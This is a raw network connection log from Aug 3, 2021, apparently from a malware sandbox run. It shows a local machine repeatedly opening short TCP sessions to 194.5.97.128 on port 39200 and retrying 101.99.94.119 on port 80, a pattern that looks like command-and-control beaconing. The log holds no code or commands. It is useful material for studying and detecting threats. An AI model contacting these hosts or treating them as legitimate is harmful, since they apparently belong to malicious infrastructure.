Aug 3, 2021 19:02:30.301058054 CEST	39200	49772	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:30.809119940 CEST	49772	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:30.855283022 CEST	39200	49772	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:31.355964899 CEST	49772	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:31.401458979 CEST	39200	49772	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:32.457505941 CEST	49773	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:32.502994061 CEST	39200	49773	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:33.012351036 CEST	49773	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:33.057836056 CEST	39200	49773	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:33.559304953 CEST	49773	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:33.604859114 CEST	39200	49773	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:34.705385923 CEST	49774	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:34.752345085 CEST	39200	49774	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:35.262634039 CEST	49774	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:35.308088064 CEST	39200	49774	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:35.809704065 CEST	49774	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:35.856059074 CEST	39200	49774	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:36.916779041 CEST	49775	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:36.962699890 CEST	39200	49775	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:37.466015100 CEST	49775	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:37.512738943 CEST	39200	49775	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:38.028376102 CEST	49775	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:38.073761940 CEST	39200	49775	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:39.114480972 CEST	49776	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:39.160329103 CEST	39200	49776	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:39.669176102 CEST	49776	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:39.714793921 CEST	39200	49776	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:40.231720924 CEST	49776	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:40.281157017 CEST	39200	49776	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:41.477297068 CEST	49777	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:41.522661924 CEST	39200	49777	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:42.030143976 CEST	49777	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:42.077430964 CEST	39200	49777	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:42.591449022 CEST	49777	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:42.636941910 CEST	39200	49777	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:43.677337885 CEST	49778	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:43.722677946 CEST	39200	49778	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:44.232089043 CEST	49778	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:44.277632952 CEST	39200	49778	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:44.779197931 CEST	49778	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:44.827169895 CEST	39200	49778	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:45.885993958 CEST	49779	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:45.932323933 CEST	39200	49779	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:46.435939074 CEST	49779	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:46.481801987 CEST	39200	49779	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:46.982270002 CEST	49779	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:47.028237104 CEST	39200	49779	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:48.071644068 CEST	49780	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:48.117324114 CEST	39200	49780	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:48.623140097 CEST	49780	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:48.669231892 CEST	39200	49780	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:49.170125961 CEST	49780	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:49.216252089 CEST	39200	49780	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:50.312063932 CEST	49781	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:50.357772112 CEST	39200	49781	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:50.873250008 CEST	49781	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:50.918688059 CEST	39200	49781	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:51.420357943 CEST	49781	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:51.465636969 CEST	39200	49781	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:52.510113955 CEST	49782	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:52.555820942 CEST	39200	49782	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:53.061002970 CEST	49782	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:53.106169939 CEST	39200	49782	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:53.612839937 CEST	49782	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:53.658854008 CEST	39200	49782	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:54.755319118 CEST	49783	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:54.834553003 CEST	39200	49783	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:55.347198963 CEST	49783	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:55.393378973 CEST	39200	49783	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:55.906455994 CEST	49783	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:55.952493906 CEST	39200	49783	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:57.259673119 CEST	49784	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:57.320341110 CEST	39200	49784	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:57.827089071 CEST	49784	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:57.872442007 CEST	39200	49784	194.5.97.128	192.168.2.3
Aug 3, 2021 19:02:58.373897076 CEST	49784	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:02:58.420490980 CEST	39200	49784	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:00.256345034 CEST	49785	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:00.301867962 CEST	39200	49785	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:00.811727047 CEST	49785	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:00.857588053 CEST	39200	49785	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:01.358520031 CEST	49785	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:01.409179926 CEST	39200	49785	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:02.456067085 CEST	49786	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:02.501568079 CEST	39200	49786	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:03.015086889 CEST	49786	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:03.060442924 CEST	39200	49786	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:03.561908007 CEST	49786	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:03.607398033 CEST	39200	49786	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:04.646868944 CEST	49787	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:04.692701101 CEST	39200	49787	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:05.212441921 CEST	49787	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:05.260169029 CEST	39200	49787	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:05.765204906 CEST	49787	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:05.810600042 CEST	39200	49787	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:06.929913044 CEST	49788	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:06.975538015 CEST	39200	49788	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:07.484230042 CEST	49788	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:07.529840946 CEST	39200	49788	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:08.030945063 CEST	49788	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:08.076823950 CEST	39200	49788	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:09.117958069 CEST	49789	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:09.163857937 CEST	39200	49789	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:09.671714067 CEST	49789	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:09.717236996 CEST	39200	49789	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:10.218700886 CEST	49789	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:10.263947964 CEST	39200	49789	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:11.309375048 CEST	49790	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:11.355185986 CEST	39200	49790	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:11.859529972 CEST	49790	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:11.906143904 CEST	39200	49790	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:12.422076941 CEST	49790	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:12.467533112 CEST	39200	49790	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:13.515732050 CEST	49791	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:13.563476086 CEST	39200	49791	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:14.078309059 CEST	49791	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:14.123708963 CEST	39200	49791	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:14.625284910 CEST	49791	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:14.670739889 CEST	39200	49791	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:15.712796926 CEST	49792	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:15.758131027 CEST	39200	49792	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:16.266134977 CEST	49792	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:16.311538935 CEST	39200	49792	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:16.813112974 CEST	49792	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:16.858856916 CEST	39200	49792	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:17.904221058 CEST	49793	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:17.950095892 CEST	39200	49793	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:18.454050064 CEST	49793	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:18.501446009 CEST	39200	49793	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:19.019318104 CEST	49793	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:19.066570997 CEST	39200	49793	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:20.123184919 CEST	49794	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:20.168442965 CEST	39200	49794	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:20.672647953 CEST	49794	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:20.718102932 CEST	39200	49794	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:21.219615936 CEST	49794	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:21.264925957 CEST	39200	49794	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:21.611143112 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:21.925216913 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:22.356333971 CEST	49795	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:22.401612043 CEST	39200	49795	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:22.532211065 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:22.907274961 CEST	49795	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:22.953249931 CEST	39200	49795	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:23.454102039 CEST	49795	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:23.500803947 CEST	39200	49795	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:23.735471010 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:24.559844017 CEST	49796	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:24.617114067 CEST	39200	49796	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:25.126173019 CEST	49796	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:25.174073935 CEST	39200	49796	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:25.688796043 CEST	49796	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:25.734653950 CEST	39200	49796	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:26.141887903 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:26.768007040 CEST	49797	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:26.813652992 CEST	39200	49797	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:27.313855886 CEST	49797	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:27.359250069 CEST	39200	49797	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:27.862164974 CEST	49797	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:27.907527924 CEST	39200	49797	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:28.957026005 CEST	49798	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:29.002203941 CEST	39200	49798	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:29.517111063 CEST	49798	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:29.562475920 CEST	39200	49798	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:30.064057112 CEST	49798	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:30.109498978 CEST	39200	49798	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:30.954873085 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:31.169720888 CEST	49799	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:31.215044022 CEST	39200	49799	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:31.720452070 CEST	49799	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:31.765686989 CEST	39200	49799	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:32.267400980 CEST	49799	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:32.312931061 CEST	39200	49799	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:33.354752064 CEST	49800	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:33.400038958 CEST	39200	49800	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:33.908314943 CEST	49800	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:33.953694105 CEST	39200	49800	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:34.455208063 CEST	49800	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:34.500559092 CEST	39200	49800	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:35.548827887 CEST	49801	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:35.598900080 CEST	39200	49801	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:36.111551046 CEST	49801	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:36.157516956 CEST	39200	49801	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:36.658504963 CEST	49801	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:36.704592943 CEST	39200	49801	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:37.811477900 CEST	49802	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:37.856734037 CEST	39200	49802	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:38.361828089 CEST	49802	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:38.407910109 CEST	39200	49802	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:38.908674002 CEST	49802	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:38.954143047 CEST	39200	49802	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:40.007826090 CEST	49803	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:40.054085970 CEST	39200	49803	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:40.564930916 CEST	49803	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:40.565001965 CEST	49736	80	192.168.2.3	101.99.94.119
Aug 3, 2021 19:03:40.611277103 CEST	39200	49803	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:41.111942053 CEST	49803	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:41.157536030 CEST	39200	49803	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:42.200062037 CEST	49804	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:42.245605946 CEST	39200	49804	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:42.752711058 CEST	49804	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:42.798147917 CEST	39200	49804	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:43.299515963 CEST	49804	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:43.345031977 CEST	39200	49804	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:44.390255928 CEST	49805	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:44.435811996 CEST	39200	49805	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:44.940422058 CEST	49805	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:44.994937897 CEST	39200	49805	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:45.503030062 CEST	49805	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:45.549439907 CEST	39200	49805	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:46.605293989 CEST	49806	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:46.651010036 CEST	39200	49806	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:47.159272909 CEST	49806	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:47.206275940 CEST	39200	49806	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:47.721985102 CEST	49806	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:47.767920017 CEST	39200	49806	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:48.799508095 CEST	49807	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:48.845186949 CEST	39200	49807	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:49.346940041 CEST	49807	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:49.392513990 CEST	39200	49807	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:49.893894911 CEST	49807	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:49.940013885 CEST	39200	49807	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:50.987432003 CEST	49808	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:51.032821894 CEST	39200	49808	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:51.534816027 CEST	49808	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:51.580065012 CEST	39200	49808	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:52.081597090 CEST	49808	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:52.127146006 CEST	39200	49808	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:53.232727051 CEST	49809	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:53.278260946 CEST	39200	49809	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:53.784985065 CEST	49809	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:53.831819057 CEST	39200	49809	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:54.347470045 CEST	49809	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:54.394840956 CEST	39200	49809	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:55.452002048 CEST	49810	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:55.497458935 CEST	39200	49810	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:56.003865004 CEST	49810	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:56.050052881 CEST	39200	49810	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:56.567423105 CEST	49810	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:56.613076925 CEST	39200	49810	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:57.670243979 CEST	49811	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:57.717941999 CEST	39200	49811	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:58.223153114 CEST	49811	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:58.268614054 CEST	39200	49811	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:58.769587994 CEST	49811	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:58.815979004 CEST	39200	49811	194.5.97.128	192.168.2.3
Aug 3, 2021 19:03:59.859882116 CEST	49812	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:03:59.906919956 CEST	39200	49812	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:00.410490036 CEST	49812	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:00.455780029 CEST	39200	49812	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:00.957298994 CEST	49812	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:01.002759933 CEST	39200	49812	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:02.453135967 CEST	49813	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:02.498709917 CEST	39200	49813	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:03.004364014 CEST	49813	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:03.049846888 CEST	39200	49813	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:03.551595926 CEST	49813	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:03.597006083 CEST	39200	49813	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:05.059597015 CEST	49814	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:05.105041027 CEST	39200	49814	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:05.615045071 CEST	49814	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:05.667435884 CEST	39200	49814	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:06.176567078 CEST	49814	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:06.223953009 CEST	39200	49814	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:07.279422045 CEST	49815	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:07.324770927 CEST	39200	49815	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:07.833012104 CEST	49815	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:07.878398895 CEST	39200	49815	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:08.379791975 CEST	49815	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:08.425263882 CEST	39200	49815	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:09.519934893 CEST	49816	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:09.566473961 CEST	39200	49816	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:10.068701029 CEST	49816	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:10.116731882 CEST	39200	49816	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:10.693547010 CEST	49816	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:10.741642952 CEST	39200	49816	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:11.812880993 CEST	49817	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:11.899791002 CEST	39200	49817	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:12.461429119 CEST	49817	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:12.511485100 CEST	39200	49817	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:13.020870924 CEST	49817	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:13.066287041 CEST	39200	49817	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:14.120368958 CEST	49818	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:14.166893959 CEST	39200	49818	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:14.677228928 CEST	49818	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:14.722934008 CEST	39200	49818	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:15.224169970 CEST	49818	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:15.269742966 CEST	39200	49818	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:16.309446096 CEST	49819	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:16.354808092 CEST	39200	49819	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:16.864877939 CEST	49819	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:16.910346985 CEST	39200	49819	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:17.411775112 CEST	49819	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:17.458595991 CEST	39200	49819	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:18.514957905 CEST	49823	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:18.562004089 CEST	39200	49823	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:19.069195986 CEST	49823	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:19.114743948 CEST	39200	49823	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:19.632318020 CEST	49823	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:19.680340052 CEST	39200	49823	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:20.738867044 CEST	49824	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:20.784491062 CEST	39200	49824	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:21.287153959 CEST	49824	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:21.332662106 CEST	39200	49824	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:21.834083080 CEST	49824	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:21.879555941 CEST	39200	49824	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:22.991684914 CEST	49825	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:23.037247896 CEST	39200	49825	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:23.537667036 CEST	49825	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:23.594547033 CEST	39200	49825	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:24.099864006 CEST	49825	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:24.146034956 CEST	39200	49825	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:25.259726048 CEST	49827	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:25.305957079 CEST	39200	49827	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:25.818763018 CEST	49827	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:25.864548922 CEST	39200	49827	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:26.365741968 CEST	49827	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:26.411020994 CEST	39200	49827	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:27.444144964 CEST	49828	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:27.489451885 CEST	39200	49828	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:27.992034912 CEST	49828	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:28.039263964 CEST	39200	49828	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:28.553365946 CEST	49828	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:28.599447966 CEST	39200	49828	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:29.648818970 CEST	49831	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:29.700584888 CEST	39200	49831	194.5.97.128	192.168.2.3
